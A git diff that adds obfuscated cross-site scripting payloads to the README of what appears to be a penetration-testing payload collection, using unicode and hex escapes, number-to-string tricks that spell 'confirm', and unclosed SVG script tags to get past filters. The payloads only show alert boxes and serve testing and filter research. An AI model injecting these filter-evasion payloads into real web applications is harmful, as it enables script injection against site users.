diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index 43804cd..641d526 100644
--- a/XSS Injection/README.md	
+++ b/XSS Injection/README.md	
@@ -158,6 +158,9 @@ Most tools are also suitable for blind XSS attacks:
 <scr<script>ipt>alert('XSS')</scr<script>ipt>
 "><script>alert('XSS')</script>
 "><script>alert(String.fromCharCode(88,83,83))</script>
+<script>\u0061lert('22')</script>
+<script>eval('\x61lert(\'33\')')</script>
+<script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm"
 
 // Img payload
 <img src=x onerror=alert('XSS');>
@@ -177,6 +180,8 @@ Most tools are also suitable for blind XSS attacks:
 "><svg/onload=alert(String.fromCharCode(88,83,83))>
 "><svg/onload=alert(/XSS/)
 <svg><script href=data:,alert(1) />(`Firefox` is the only browser which allows self closing script)
+<svg><script>alert('33')
+<svg><script>alert&lpar;'33'&rpar;
 
 // Div payload
 <div onpointerover="alert(45)">MOVE HERE</div>